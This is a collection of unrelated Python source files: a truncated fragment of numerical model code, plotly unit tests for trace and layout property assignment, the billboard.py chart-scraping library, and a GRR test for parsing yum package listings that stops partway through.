getDiffusiveFluxBoundaryConditions=self.diffusiveFluxBoundaryConditionsSetterDictDict[cj]))
for cj in list(self.advectiveFluxBoundaryConditionsSetterDict.keys())])
self.coefficients.initializeGlobalExteriorElementBoundaryQuadrature(self.timeIntegration.t, self.ebqe)
    def estimate_mt(self):
        """Intentionally a no-op for this model."""
        pass
    def calculateSolutionAtQuadrature(self):
        """Intentionally a no-op for this model."""
        pass
    def calculateAuxiliaryQuantitiesAfterStep(self):
        """Intentionally a no-op for this model."""
        pass
| |
from unittest import TestCase
import plotly.graph_objs as go
from plotly.tests.utils import strip_dict_params
class TestAssignmentPrimitive(TestCase):
    """Tests for assigning primitive (scalar) trace properties.

    Each test sets the same property through a different one of the
    equivalent assignment syntaxes exercised here: attribute access, item
    access, dotted-path strings, key tuples, update() with nested dicts,
    and magic underscore names.
    """

    def setUp(self):
        # Construct initial scatter object
        self.scatter = go.Scatter(name="scatter A")

        # Assert initial state
        d1, d2 = strip_dict_params(
            self.scatter, {"type": "scatter", "name": "scatter A"}
        )
        assert d1 == d2

        # Construct expected results
        self.expected_toplevel = {
            "type": "scatter",
            "name": "scatter A",
            "fillcolor": "green",
        }

        self.expected_nested = {
            "type": "scatter",
            "name": "scatter A",
            "marker": {"colorbar": {"title": {"font": {"family": "courier"}}}},
        }

        self.expected_nested_error_x = {
            "type": "scatter",
            "name": "scatter A",
            "error_x": {"type": "percent"},
        }

    def test_toplevel_attr(self):
        # Plain attribute assignment.
        assert self.scatter.fillcolor is None
        self.scatter.fillcolor = "green"
        assert self.scatter.fillcolor == "green"
        d1, d2 = strip_dict_params(self.scatter, self.expected_toplevel)
        assert d1 == d2

    def test_toplevel_item(self):
        # Dict-style item assignment.
        assert self.scatter["fillcolor"] is None
        self.scatter["fillcolor"] = "green"
        assert self.scatter["fillcolor"] == "green"
        d1, d2 = strip_dict_params(self.scatter, self.expected_toplevel)
        assert d1 == d2

    def test_nested_attr(self):
        # NOTE(review): 'titlefont' is accepted here as an alias for
        # 'title.font' — the expected dict uses the title.font form.
        assert self.scatter.marker.colorbar.titlefont.family is None
        self.scatter.marker.colorbar.titlefont.family = "courier"
        assert self.scatter.marker.colorbar.titlefont.family == "courier"
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2

    def test_nested_item(self):
        # Chained item access reaches nested properties.
        assert self.scatter["marker"]["colorbar"]["title"]["font"]["family"] is None
        self.scatter["marker"]["colorbar"]["title"]["font"]["family"] = "courier"
        assert (
            self.scatter["marker"]["colorbar"]["title"]["font"]["family"] == "courier"
        )
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2

    def test_nested_item_dots(self):
        # Dotted-path string keys address nested properties in one lookup.
        assert self.scatter["marker.colorbar.title.font.family"] is None
        self.scatter["marker.colorbar.title.font.family"] = "courier"
        assert self.scatter["marker.colorbar.title.font.family"] == "courier"
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2

    def test_nested_item_tuple(self):
        # Key tuples may mix plain components with dotted ones.
        assert self.scatter["marker.colorbar.title.font.family"] is None
        self.scatter[("marker", "colorbar", "title.font", "family")] = "courier"
        assert self.scatter[("marker", "colorbar", "title.font", "family")] == "courier"
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2

    def test_nested_update(self):
        # update() with a nested dict sets the leaf property.
        self.scatter.update(
            marker={"colorbar": {"title": {"font": {"family": "courier"}}}}
        )
        assert (
            self.scatter[("marker", "colorbar", "title", "font", "family")] == "courier"
        )
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2

    def test_nested_update_dots(self):
        # update() also accepts dotted-path keys.
        assert self.scatter["marker.colorbar.title.font.family"] is None
        self.scatter.update({"marker.colorbar.title.font.family": "courier"})
        assert self.scatter["marker.colorbar.title.font.family"] == "courier"
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2

    def test_nested_update_underscores(self):
        # Magic underscore notation: error_x_type -> error_x.type.
        assert self.scatter["error_x.type"] is None
        self.scatter.update({"error_x_type": "percent"})
        assert self.scatter["error_x_type"] == "percent"
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested_error_x)
        assert d1 == d2
class TestAssignmentCompound(TestCase):
    """Tests for assigning compound (nested graph-object) trace properties.

    Each test assigns a compound property either as a typed graph object or
    as a plain dict (which is coerced to the graph-object type), through the
    various equivalent assignment syntaxes, and checks the resulting dict.
    """

    def setUp(self):
        # Construct initial scatter object
        self.scatter = go.Scatter(name="scatter A")

        # Assert initial state
        d1, d2 = strip_dict_params(
            self.scatter, {"type": "scatter", "name": "scatter A"}
        )
        assert d1 == d2

        # Construct expected results
        self.expected_toplevel = {
            "type": "scatter",
            "name": "scatter A",
            "marker": {"color": "yellow", "size": 10},
        }

        self.expected_nested = {
            "type": "scatter",
            "name": "scatter A",
            "marker": {"colorbar": {"bgcolor": "yellow", "thickness": 5}},
        }

    def test_toplevel_obj(self):
        # Compound properties start out as empty objects.
        d1, d2 = strip_dict_params(self.scatter.marker, {})
        assert d1 == d2
        self.scatter.marker = go.scatter.Marker(color="yellow", size=10)
        assert isinstance(self.scatter.marker, go.scatter.Marker)
        d1, d2 = strip_dict_params(
            self.scatter.marker, self.expected_toplevel["marker"]
        )
        assert d1 == d2
        d1, d2 = strip_dict_params(self.scatter, self.expected_toplevel)
        assert d1 == d2

    def test_toplevel_dict(self):
        # Assigning a plain dict coerces it to the graph-object type.
        d1, d2 = strip_dict_params(self.scatter["marker"], {})
        assert d1 == d2
        self.scatter["marker"] = dict(color="yellow", size=10)
        assert isinstance(self.scatter["marker"], go.scatter.Marker)
        d1, d2 = strip_dict_params(
            self.scatter.marker, self.expected_toplevel["marker"]
        )
        assert d1 == d2
        d1, d2 = strip_dict_params(self.scatter, self.expected_toplevel)
        assert d1 == d2

    def test_nested_obj(self):
        # Assign a typed object two levels down.
        d1, d2 = strip_dict_params(self.scatter.marker.colorbar, {})
        assert d1 == d2
        self.scatter.marker.colorbar = go.scatter.marker.ColorBar(
            bgcolor="yellow", thickness=5
        )
        assert isinstance(self.scatter.marker.colorbar, go.scatter.marker.ColorBar)
        d1, d2 = strip_dict_params(
            self.scatter.marker.colorbar, self.expected_nested["marker"]["colorbar"]
        )
        assert d1 == d2
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2

    def test_nested_dict(self):
        # Assign a plain dict two levels down; it is coerced as well.
        d1, d2 = strip_dict_params(self.scatter["marker"]["colorbar"], {})
        assert d1 == d2
        self.scatter["marker"]["colorbar"] = dict(bgcolor="yellow", thickness=5)
        assert isinstance(
            self.scatter["marker"]["colorbar"], go.scatter.marker.ColorBar
        )
        d1, d2 = strip_dict_params(
            self.scatter["marker"]["colorbar"],
            self.expected_nested["marker"]["colorbar"],
        )
        assert d1 == d2
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2

    def test_nested_dict_dot(self):
        # Dotted-path key assignment of a compound value.
        d1, d2 = strip_dict_params(self.scatter.marker.colorbar, {})
        assert d1 == d2
        self.scatter["marker.colorbar"] = dict(bgcolor="yellow", thickness=5)
        assert isinstance(self.scatter["marker.colorbar"], go.scatter.marker.ColorBar)
        d1, d2 = strip_dict_params(
            self.scatter["marker.colorbar"], self.expected_nested["marker"]["colorbar"]
        )
        assert d1 == d2
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2

    def test_nested_dict_tuple(self):
        # Key-tuple assignment of a compound value.
        d1, d2 = strip_dict_params(self.scatter[("marker", "colorbar")], {})
        assert d1 == d2
        self.scatter[("marker", "colorbar")] = dict(bgcolor="yellow", thickness=5)
        assert isinstance(
            self.scatter[("marker", "colorbar")], go.scatter.marker.ColorBar
        )
        d1, d2 = strip_dict_params(
            self.scatter[("marker", "colorbar")],
            self.expected_nested["marker"]["colorbar"],
        )
        assert d1 == d2
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2

    def test_nested_update_obj(self):
        # update() accepts typed graph objects as nested values.
        self.scatter.update(
            marker={
                "colorbar": go.scatter.marker.ColorBar(bgcolor="yellow", thickness=5)
            }
        )
        assert isinstance(
            self.scatter["marker"]["colorbar"], go.scatter.marker.ColorBar
        )
        d1, d2 = strip_dict_params(
            self.scatter["marker"]["colorbar"],
            self.expected_nested["marker"]["colorbar"],
        )
        assert d1 == d2
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2

    def test_nested_update_dict(self):
        # update() accepts plain dicts as nested values.
        self.scatter.update(marker={"colorbar": dict(bgcolor="yellow", thickness=5)})
        assert isinstance(
            self.scatter["marker"]["colorbar"], go.scatter.marker.ColorBar
        )
        d1, d2 = strip_dict_params(
            self.scatter["marker"]["colorbar"],
            self.expected_nested["marker"]["colorbar"],
        )
        assert d1 == d2
        d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
        assert d1 == d2
class TestAssignmnetNone(TestCase):
    """Tests that assigning None removes properties.

    NOTE(review): the class name contains a typo ("Assignmnet"); it is kept
    as-is to preserve the public name.
    """

    def test_toplevel(self):
        # Build a scatter with scalar, array and compound properties set.
        trace = go.Scatter(
            name="scatter A",
            y=[3, 2, 4],
            marker={"colorbar": {"title": {"font": {"family": "courier"}}}},
        )
        want = {
            "type": "scatter",
            "name": "scatter A",
            "y": [3, 2, 4],
            "marker": {"colorbar": {"title": {"font": {"family": "courier"}}}},
        }
        got, expected = strip_dict_params(trace, want)
        assert got == expected

        # Assigning None to properties that are not set is a no-op.
        trace.x = None
        got, expected = strip_dict_params(trace, want)
        assert got == expected

        trace["line.width"] = None
        got, expected = strip_dict_params(trace, want)
        assert got == expected

        # Assigning None to a set scalar/array property removes it.
        trace.y = None
        want.pop("y")
        got, expected = strip_dict_params(trace, want)
        assert got == expected

        # Compound properties can be removed the same way, at any depth.
        trace[("marker", "colorbar", "title", "font")] = None
        want["marker"]["colorbar"]["title"].pop("font")
        got, expected = strip_dict_params(trace, want)
        assert got == expected

        trace.marker = None
        want.pop("marker")
        got, expected = strip_dict_params(trace, want)
        assert got == expected
class TestAssignCompoundArray(TestCase):
    """Tests for assigning arrays of compound objects.

    Covers parcoords.dimensions and layout.updatemenus (including the
    nested updatemenus[i].buttons array), through attribute access, item
    access, key tuples, dotted/bracket path strings, underscore names, and
    update() with both dict- and list-shaped values.
    """

    def setUp(self):
        # Construct initial parcoords object (fixed: comment previously
        # said "scatter").
        self.parcoords = go.Parcoords(name="parcoords A")

        # Assert initial state
        d1, d2 = strip_dict_params(
            self.parcoords, {"type": "parcoords", "name": "parcoords A"}
        )
        assert d1 == d2

        # Construct expected results
        self.expected_toplevel = {
            "type": "parcoords",
            "name": "parcoords A",
            "dimensions": [
                {"values": [2, 3, 1], "visible": True},
                {"values": [1, 2, 3], "label": "dim1"},
            ],
        }

        self.layout = go.Layout()

        self.expected_layout1 = {"updatemenus": [{}, {"font": {"family": "courier"}}]}

        self.expected_layout2 = {
            "updatemenus": [{}, {"buttons": [{}, {}, {"method": "restyle"}]}]
        }

    def test_assign_toplevel_array(self):
        # Array properties default to an empty tuple; list elements may be
        # typed objects or plain dicts.
        self.assertEqual(self.parcoords.dimensions, ())

        self.parcoords["dimensions"] = [
            go.parcoords.Dimension(values=[2, 3, 1], visible=True),
            dict(values=[1, 2, 3], label="dim1"),
        ]

        self.assertEqual(self.parcoords.to_plotly_json(), self.expected_toplevel)

    def test_assign_nested_attr(self):
        self.assertEqual(self.layout.updatemenus, ())

        # Initialize empty updatemenus
        self.layout.updatemenus = [{}, {}]
        self.assertEqual(
            self.layout["updatemenus"], (go.layout.Updatemenu(), go.layout.Updatemenu())
        )

        self.layout.updatemenus[1].font.family = "courier"
        d1, d2 = strip_dict_params(self.layout, self.expected_layout1)
        assert d1 == d2

    def test_assign_double_nested_attr(self):
        self.assertEqual(self.layout.updatemenus, ())

        # Initialize empty updatemenus
        self.layout.updatemenus = [{}, {}]

        # Initialize empty buttons in updatemenu[1]
        self.layout.updatemenus[1].buttons = [{}, {}, {}]

        # Assign
        self.layout.updatemenus[1].buttons[2].method = "restyle"

        # Check
        self.assertEqual(self.layout.updatemenus[1].buttons[2].method, "restyle")
        d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
        assert d1 == d2

    def test_assign_double_nested_item(self):
        self.assertEqual(self.layout.updatemenus, ())

        # Initialize empty updatemenus
        self.layout.updatemenus = [{}, {}]

        # Initialize empty buttons in updatemenu[1]
        self.layout["updatemenus"][1]["buttons"] = [{}, {}, {}]

        # Assign
        self.layout["updatemenus"][1]["buttons"][2]["method"] = "restyle"

        # Check
        self.assertEqual(
            self.layout["updatemenus"][1]["buttons"][2]["method"], "restyle"
        )
        d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
        assert d1 == d2

    def test_assign_double_nested_tuple(self):
        self.assertEqual(self.layout.updatemenus, ())

        # Initialize empty updatemenus
        self.layout.updatemenus = [{}, {}]

        # Initialize empty buttons in updatemenu[1]; tuples may contain
        # integer array indices.
        self.layout[("updatemenus", 1, "buttons")] = [{}, {}, {}]

        # Assign
        self.layout[("updatemenus", 1, "buttons", 2, "method")] = "restyle"

        # Check
        self.assertEqual(
            self.layout[("updatemenus", 1, "buttons", 2, "method")], "restyle"
        )
        d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
        assert d1 == d2

    def test_assign_double_nested_dot(self):
        self.assertEqual(self.layout.updatemenus, ())

        # Initialize empty updatemenus
        self.layout["updatemenus"] = [{}, {}]

        # Initialize empty buttons in updatemenu[1]; both '.1.' and '[1].'
        # index syntaxes are exercised below.
        self.layout["updatemenus.1.buttons"] = [{}, {}, {}]

        # Assign
        self.layout["updatemenus[1].buttons[2].method"] = "restyle"

        # Check
        self.assertEqual(self.layout["updatemenus[1].buttons[2].method"], "restyle")
        d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
        assert d1 == d2

    def test_assign_double_nested_update_dict(self):
        # Initialize empty updatemenus
        self.layout.updatemenus = [{}, {}]

        # Initialize empty buttons in updatemenu[1]
        self.layout.updatemenus[1].buttons = [{}, {}, {}]

        # Update: integer keys address array elements.
        self.layout.update(updatemenus={1: {"buttons": {2: {"method": "restyle"}}}})

        # Check
        self.assertEqual(self.layout.updatemenus[1].buttons[2].method, "restyle")
        d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
        assert d1 == d2

    def test_assign_double_nested_update_array(self):
        # Initialize empty updatemenus
        self.layout.updatemenus = [{}, {}]

        # Initialize empty buttons in updatemenu[1]
        self.layout.updatemenus[1].buttons = [{}, {}, {}]

        # Update with a list of per-element dicts.
        self.layout.update(
            updatemenus=[{}, {"buttons": [{}, {}, {"method": "restyle"}]}]
        )

        # Check
        self.assertEqual(self.layout.updatemenus[1].buttons[2].method, "restyle")
        d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
        assert d1 == d2

    def test_update_double_nested_dot(self):
        self.assertEqual(self.layout.updatemenus, ())

        # Initialize empty updatemenus
        self.layout["updatemenus"] = [{}, {}]

        # Initialize empty buttons in updatemenu[1]
        self.layout["updatemenus.1.buttons"] = [{}, {}, {}]

        # Update via a bracket-indexed path string.
        self.layout.update({"updatemenus[1].buttons[2].method": "restyle"})

        # Check
        self.assertEqual(self.layout["updatemenus[1].buttons[2].method"], "restyle")
        d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
        assert d1 == d2

    def test_update_double_nested_underscore(self):
        self.assertEqual(self.layout.updatemenus, ())

        # Initialize empty updatemenus
        self.layout["updatemenus"] = [{}, {}]

        # Initialize empty buttons in updatemenu[1]
        self.layout["updatemenus_1_buttons"] = [{}, {}, {}]

        # Update via magic underscore notation.
        self.layout.update({"updatemenus_1_buttons_2_method": "restyle"})

        # Check
        self.assertEqual(self.layout["updatemenus[1].buttons[2].method"], "restyle")
        d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
        assert d1 == d2
| |
#!/usr/bin/env python
import datetime
import json
import re
import sys
from bs4 import BeautifulSoup
import requests
"""billboard.py: Unofficial Python API for accessing music charts from Billboard.com."""
__author__ = "Allen Guo"
__license__ = "MIT"
__maintainer__ = "Allen Guo"
__email__ = "guoguo12@gmail.com"
# Request headers sent with every fetch; identifies this library to
# Billboard.com.
HEADERS = {
    'User-Agent': 'billboard.py (https://github.com/guoguo12/billboard-charts)'
}

# css selector constants
_DATE_ELEMENT_SELECTOR = 'button.chart-detail-header__date-selector-button'
_PREVIOUS_DATE_SELECTOR = 'span.fa-chevron-left'
_NEXT_DATE_SELECTOR = 'span.fa-chevron-right'
# Selectors for the specially-rendered number-one entry.
_TOP_TITLE_SELECTOR = 'div.chart-number-one__title'
_TOP_ARTIST_SELECTOR = 'div.chart-number-one__artist'
_TOP_LAST_POS_SELECTOR = 'div.chart-number-one__last-week'
_TOP_WEEKS_SELECTOR = 'div.chart-number-one__weeks-on-chart'
# Selector and data attributes for the remaining chart entries.
_ENTRY_LIST_SELECTOR = 'div.chart-list-item'
_ENTRY_TITLE_ATTR = 'data-title'
_ENTRY_ARTIST_ATTR = 'data-artist'
_ENTRY_RANK_ATTR = 'data-rank'

# constants for the getPositionRowValue helper function
_ROW_SELECTOR_FORMAT = 'div.chart-list-item__%s'
_PEAK_POS_FORMAT = 'weeks-at-one'
_LAST_POS_FORMAT = 'last-week'
_WEEKS_ON_CHART_FORMAT = 'weeks-on-chart'
class BillboardNotFoundException(Exception):
    """Raised when the requested chart does not exist (HTTP 404)."""
    pass
class BillboardParseException(Exception):
    """Raised when a fetched chart page cannot be parsed as expected."""
    pass
class ChartEntry:
    """A single entry (typically one track) on a chart.

    Attributes:
        title: The title of the track.
        artist: The artist name as formatted on Billboard.com; may contain
            multiple and/or featured artists.
        peakPos: The track's peak chart position at any point in time,
            including future dates, as an int (or None if the chart does
            not include this information).
        lastPos: The position on the previous week's chart, as an int (or
            None if unavailable); 0 means the track was not on last week's
            chart.
        weeks: The number of weeks the track has been or was on the chart,
            including future dates (up until the present time).
        rank: The track's position on the chart, as an int.
        isNew: Whether the track is new to the chart, as a boolean.
    """

    def __init__(self, title, artist, peakPos, lastPos, weeks, rank, isNew):
        self.title = title
        self.artist = artist
        self.peakPos = peakPos
        self.lastPos = lastPos
        self.weeks = weeks
        self.rank = rank
        self.isNew = isNew

    def __repr__(self):
        return '{}.{}(title={!r}, artist={!r})'.format(
            self.__class__.__module__,
            self.__class__.__name__,
            self.title,
            self.artist)

    def __str__(self):
        """Returns a string of the form 'TITLE by ARTIST'.
        """
        if self.title:
            text = u"'%s' by %s" % (self.title, self.artist)
        else:
            text = u"%s" % self.artist

        if sys.version_info.major >= 3:
            return text
        # Python 2 only: encode to the terminal's encoding (utf8 fallback).
        return text.encode(getattr(sys.stdout, 'encoding', '') or 'utf8')

    def json(self):
        """Returns the entry as a JSON string.

        This is useful for caching.
        """
        return json.dumps(
            self, sort_keys=True, indent=4, default=lambda o: o.__dict__)
class ChartData:
    """Represents a particular Billboard chart for a particular date.

    Attributes:
        name: The chart name, as a string.
        date: The date of the chart.
        previousDate: The date of the previous chart, as a string in YYYY-MM-DD
            format, or None if this information was not available.
        nextDate: The date of the next chart, as a string in YYYY-MM-DD
            format, or None if this information was not available.
        entries: A list of ChartEntry objects, ordered by position on the chart
            (highest first).
    """

    def __init__(self, name, date=None, fetch=True, timeout=25):
        """Constructs a new ChartData instance.

        Args:
            name: The chart name, e.g. 'hot-100' or 'pop-songs'.
                You can browse the Charts section of Billboard.com to find
                valid chart names; the URL of a chart will look like
                "http://www.billboard.com/charts/CHART-NAME".
            date: The chart date, as a string in YYYY-MM-DD format.
                By default, the latest chart is fetched.
                If the argument is not a date on which a chart was published,
                Billboard automatically rounds dates up to the nearest date on
                which a chart was published.
                If this argument is invalid, no exception will be raised;
                instead, the chart will contain no entries.
            fetch: A boolean indicating whether to fetch the chart data from
                Billboard.com immediately (at instantiation time).
                If False, the chart data can be populated at a later time
                using the fetchEntries() method.
            timeout: The number of seconds to wait for a server response.
                If None, no timeout is applied.

        Raises:
            ValueError: If `date` is supplied but not in YYYY-MM-DD format.
        """
        self.name = name
        # Raw string avoids '\d' being treated as an (invalid) string escape.
        if date is not None and not re.match(r'\d{4}-\d{2}-\d{2}', str(date)):
            raise ValueError('Date argument is not in YYYY-MM-DD format')
        self.date = date
        self.previousDate = None
        # Fix: nextDate was previously only ever set inside fetchEntries(),
        # so reading it could raise AttributeError (e.g. with fetch=False or
        # when no next-week link exists). Initialize it like previousDate.
        self.nextDate = None
        self._timeout = timeout
        self.entries = []
        if fetch:
            self.fetchEntries()

    def __repr__(self):
        return '{}.{}({!r}, date={!r})'.format(self.__class__.__module__,
                                               self.__class__.__name__,
                                               self.name, self.date)

    def __str__(self):
        """Returns the chart as a human-readable string (typically multi-line).
        """
        if not self.date:
            s = '%s chart (current)' % self.name
        else:
            s = '%s chart from %s' % (self.name, self.date)
        s += '\n' + '-' * len(s)
        # One line per entry, highest rank first.
        for entry in self.entries:
            s += '\n%s. %s' % (entry.rank, str(entry))
        return s

    def __getitem__(self, key):
        """Returns the (key + 1)-th chart entry; i.e., chart[0] refers to the
        top entry on the chart.
        """
        return self.entries[key]

    def __len__(self):
        """Returns the number of entries in the chart.
        A length of zero may indicate a failed/bad request.
        """
        return len(self.entries)

    def json(self):
        """Returns the entry as a JSON string.
        This is useful for caching.
        """
        return json.dumps(self, default=lambda o: o.__dict__,
                          sort_keys=True, indent=4)

    def fetchEntries(self):
        """GETs the corresponding chart data from Billboard.com, then parses
        the data using BeautifulSoup.

        Raises:
            BillboardNotFoundException: If the chart name is unknown (404).
            BillboardParseException: If the page structure could not be
                parsed.
        """
        if not self.date:
            # Fetch latest chart
            url = 'http://www.billboard.com/charts/%s' % (self.name)
        else:
            url = 'http://www.billboard.com/charts/%s/%s' % (
                self.name, self.date)

        req = requests.get(url, headers=HEADERS, timeout=self._timeout)
        if req.status_code == 404:
            message = "Chart not found (perhaps the name is misspelled?)"
            raise BillboardNotFoundException(message)
        req.raise_for_status()

        soup = BeautifulSoup(req.text, 'html.parser')

        # Resolve the actual chart date (Billboard rounds requested dates).
        dateElement = soup.select_one(_DATE_ELEMENT_SELECTOR)
        if dateElement:
            dateText = dateElement.text.strip()
            self.date = datetime.datetime.strptime(dateText, '%B %d, %Y').strftime('%Y-%m-%d')

        # Previous/next chart dates come from the navigation chevron links.
        prevWeek = soup.select_one(_PREVIOUS_DATE_SELECTOR)
        nextWeek = soup.select_one(_NEXT_DATE_SELECTOR)
        if prevWeek and prevWeek.parent.get('href'):
            self.previousDate = prevWeek.parent.get('href').split('/')[-1]
        if nextWeek and nextWeek.parent.get('href'):
            self.nextDate = nextWeek.parent.get('href').split('/')[-1]

        # The number-one entry is rendered with its own markup, so it is
        # parsed separately from the rest of the list.
        # All `except` clauses below were narrowed from bare `except:` so
        # that KeyboardInterrupt/SystemExit are no longer swallowed.
        try:
            topTitle = soup.select_one(_TOP_TITLE_SELECTOR).string.strip()
        except Exception:
            message = "Failed to parse top track title"
            raise BillboardParseException(message)

        try:
            topArtistElement = soup.select_one(_TOP_ARTIST_SELECTOR) or ''
            if topArtistElement == '':
                # No artist element: the "title" slot actually holds the
                # artist (e.g. artist-only charts).
                topTitle, topArtist = '', topTitle
            elif topArtistElement.a is None:
                topArtist = topArtistElement.getText().strip()
            else:
                topArtist = topArtistElement.a.getText().strip()
        except Exception:
            message = "Failed to parse top track artist"
            raise BillboardParseException(message)

        topRank = 1

        if self.date:
            topPeakPos = 1
            try:
                topLastPos = int(soup.select_one(_TOP_LAST_POS_SELECTOR).string.strip())
            except Exception:
                # if there is no div with class div.chart-number-one__last-week,
                # that means it was the top song the prior week
                topLastPos = 1
            topWeeksElement = soup.select_one(_TOP_WEEKS_SELECTOR)
            topWeeks = int(topWeeksElement.string.strip()) if topWeeksElement is not None else 0
            topIsNew = topWeeks == 0
        else:
            # Undated (current) charts do not expose historical stats.
            topPeakPos = topLastPos = topWeeks = None
            topIsNew = False

        topEntry = ChartEntry(topTitle, topArtist, topPeakPos, topLastPos, topWeeks, topRank, topIsNew)
        self.entries.append(topEntry)

        for entrySoup in soup.select(_ENTRY_LIST_SELECTOR):
            try:
                title = entrySoup[_ENTRY_TITLE_ATTR].strip()
            except Exception:
                message = "Failed to parse title"
                raise BillboardParseException(message)

            try:
                artist = entrySoup[_ENTRY_ARTIST_ATTR].strip() or ''
            except Exception:
                message = "Failed to parse artist"
                raise BillboardParseException(message)

            if artist == '':
                # Artist-only rows store the artist in the title attribute.
                title, artist = artist, title

            try:
                rank = int(entrySoup[_ENTRY_RANK_ATTR].strip())
            except Exception:
                message = "Failed to parse rank"
                raise BillboardParseException(message)

            def getPositionRowValue(rowName):
                # Reads an integer stat ('weeks-at-one', 'last-week',
                # 'weeks-on-chart') from the entry's stat rows; '-' or a
                # missing row means 0.
                try:
                    selector = _ROW_SELECTOR_FORMAT % rowName
                    selected = entrySoup.select_one(selector)
                    if selected is None or selected.string == '-':
                        return 0
                    else:
                        return int(selected.string.strip())
                except Exception:
                    message = "Failed to parse row value: %s" % rowName
                    raise BillboardParseException(message)

            if self.date:
                peakPos = getPositionRowValue(_PEAK_POS_FORMAT)
                # A missing peak means the current rank is the peak.
                peakPos = rank if peakPos == 0 else peakPos
                lastPos = getPositionRowValue(_LAST_POS_FORMAT)
                weeks = getPositionRowValue(_WEEKS_ON_CHART_FORMAT)
                isNew = weeks == 0
            else:
                peakPos = lastPos = weeks = None
                isNew = False

            entry = ChartEntry(title, artist, peakPos, lastPos, weeks, rank, isNew)
            self.entries.append(entry)
| |
#!/usr/bin/env python
"""Unit test for the linux cmd parser."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import os
from absl import app
from absl.testing import absltest
from typing import Sequence
from typing import Text
from grr_response_core.lib.parsers import linux_cmd_parser
from grr_response_core.lib.rdfvalues import anomaly as rdf_anomaly
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr.test_lib import test_lib
class YumListCmdParserTest(absltest.TestCase):
  """Tests for parsing `yum list installed` output.

  Yum output lines have the form 'NAME.ARCH VERSION REPO'; long values may
  wrap a single logical entry across multiple physical lines.
  """

  def testSimpleOutput(self):
    # One package per line; the last '.' splits name from architecture.
    output = """\
Installed Packages
foo.i386 3.14 @foo
bar.z80 2.71 @bar
java-1.8.0.armv8 1.41 @baz
"""
    packages = self._Parse(output)
    self.assertSequenceEqual(packages, [
        rdf_client.SoftwarePackage.Installed(
            name="foo", architecture="i386", publisher="@foo", version="3.14"),
        rdf_client.SoftwarePackage.Installed(
            name="bar", architecture="z80", publisher="@bar", version="2.71"),
        rdf_client.SoftwarePackage.Installed(
            name="java-1.8.0",
            architecture="armv8",
            publisher="@baz",
            version="1.41"),
    ])

  def testWrappedOutput(self):
    # Entries wrapped over multiple lines must be rejoined before parsing.
    output = """\
Installed Packages
foo.i386 3.14
@foo
bar.z80 2.71 @bar
baz.armv8
1.41 @baz
"""
    packages = self._Parse(output)
    self.assertSequenceEqual(packages, [
        rdf_client.SoftwarePackage.Installed(
            name="foo", architecture="i386", publisher="@foo", version="3.14"),
        rdf_client.SoftwarePackage.Installed(
            name="bar", architecture="z80", publisher="@bar", version="2.71"),
        rdf_client.SoftwarePackage.Installed(
            name="baz", architecture="armv8", publisher="@baz", version="1.41"),
    ])

  def testRealOutput(self):
    # Captured output from a real RHEL 7 host, including wrapped entries.
    output = """\
Installed Packages
NetworkManager.x86_64 1:1.8.0-12.el7_4 @rhui-rhel-7-server-e4s-rhui-rpms
NetworkManager-config-server.noarch
1:1.8.0-12.el7_4 @rhui-rhel-7-server-e4s-rhui-rpms
NetworkManager-libnm.x86_64
1:1.8.0-12.el7_4 @rhui-rhel-7-server-e4s-rhui-rpms
NetworkManager-team.x86_64 1:1.8.0-12.el7_4 @rhui-rhel-7-server-e4s-rhui-rpms
NetworkManager-tui.x86_64 1:1.8.0-12.el7_4 @rhui-rhel-7-server-e4s-rhui-rpms
Red_Hat_Enterprise_Linux-Release_Notes-7-en-US.noarch
7-2.el7 @anaconda
cronie-anacron.x86_64 1.4.11-17.el7 @anaconda
crontabs.noarch 1.11-6.20121102git.el7
@anaconda
device-mapper.x86_64 7:1.02.140-8.el7 @anaconda
device-mapper-event.x86_64 7:1.02.140-8.el7 @rhui-rhel-7-server-e4s-rhui-rpms
device-mapper-event-libs.x86_64
7:1.02.140-8.el7 @rhui-rhel-7-server-e4s-rhui-rpms
device-mapper-libs.x86_64 7:1.02.140-8.el7 @anaconda
device-mapper-persistent-data.x86_64
0.7.0-0.1.rc6.el7_4.1
@rhui-rhel-7-server-e4s-rhui-rpms
dhclient.x86_64 12:4.2.5-58.el7_4.4 @rhui-rhel-7-server-e4s-rhui-rpms
dhcp-common.x86_64 12:4.2.5-58.el7_4.4 @rhui-rhel-7-server-e4s-rhui-rpms
"""
    packages = self._Parse(output)
    self.assertSequenceEqual(packages, [
        rdf_client.SoftwarePackage.Installed(
            name="NetworkManager",
            architecture="x86_64",
            version="1:1.8.0-12.el7_4",
            publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
        rdf_client.SoftwarePackage.Installed(
            name="NetworkManager-config-server",
            architecture="noarch",
            version="1:1.8.0-12.el7_4",
            publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
        rdf_client.SoftwarePackage.Installed(
            name="NetworkManager-libnm",
            architecture="x86_64",
            version="1:1.8.0-12.el7_4",
            publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
        rdf_client.SoftwarePackage.Installed(
            name="NetworkManager-team",
            architecture="x86_64",
            version="1:1.8.0-12.el7_4",
            publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
        rdf_client.SoftwarePackage.Installed(
